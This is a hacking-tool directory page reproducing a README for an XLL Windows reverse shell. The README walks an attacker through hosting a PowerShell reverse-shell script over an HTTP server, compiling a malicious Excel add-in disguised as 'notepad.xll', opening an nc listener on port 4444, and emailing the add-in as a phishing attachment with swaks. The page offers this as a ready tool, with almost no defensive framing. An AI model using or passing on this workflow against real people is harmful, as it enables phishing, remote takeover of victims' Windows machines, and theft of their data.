Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
xll_windows_reverse_shell — xll windows reverse shell | Kitploit
Tools/GitHubGitHub/h3x0v3rl0rd/xll_windows_reverse_shell
Phishing ToolsExploitationCommand and ControlSocial EngineeringRed TeamingPayload DevelopmentRemote Access Trojan
GitHubh3x0v3rl0rd/xll_windows_reverse_shell

xll_windows_reverse_shell

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

xll windows reverse shell

View Repository
171 year agoNot yet reviewed

xll_windows_reverse_shell

xll windows reverse shell

In your Attacker (Kali) machine:

root@kitploit:~
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
  1. Update the revsh.ps1
  2. create python http server
root@kitploit:~
python3 -m http.server 9999

In your Attacker (Windows) machine:

  1. Move notpadXLL.c to your windows attacker machine and update the notpadXLL.c accordingly.
  2. Open x64 Native Tools Command Prompt for VS 2022
  3. run below command to genarte notepad.xll
root@kitploit:~
cl.exe /LD notepadXLL.c /link /out:notepad.xll

image

  1. move this notepad.xll to your Kali machine

In your Kali Machine

  1. download swaks
root@kitploit:~
 curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
  1. configure nc listner
root@kitploit:~
nc -nlvp 4444
  1. Use swaks to send an email with notepad.xll attached:
root@kitploit:~
./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll

image

Download Tool